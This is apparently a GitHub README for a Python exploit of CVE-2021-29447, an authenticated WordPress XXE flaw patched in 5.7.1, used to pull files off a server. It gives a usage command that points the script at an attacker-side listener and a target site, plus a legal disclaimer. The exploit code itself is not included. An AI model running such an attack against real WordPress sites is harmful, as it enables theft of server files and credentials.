M3l0nPan / wordpress-cve-2021-29447

Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.

WordPress CVE-2021-29447 exploit

Exploits the authenticated WordPress Media Library XML External Entity Injection (XXE) vulnerability to exfiltrate files.

Patched in WordPress 5.7.1.

Requires valid WordPress credentials to interact with the Media Library.

Usage

python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD

The script asks for a file path and returns the requested file.

Credit

Inspired by David Utón's (M3n0sD0n4ld) ExploitDB script.

Disclaimer

Usage of this for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

License

This script is released under the MIT License.
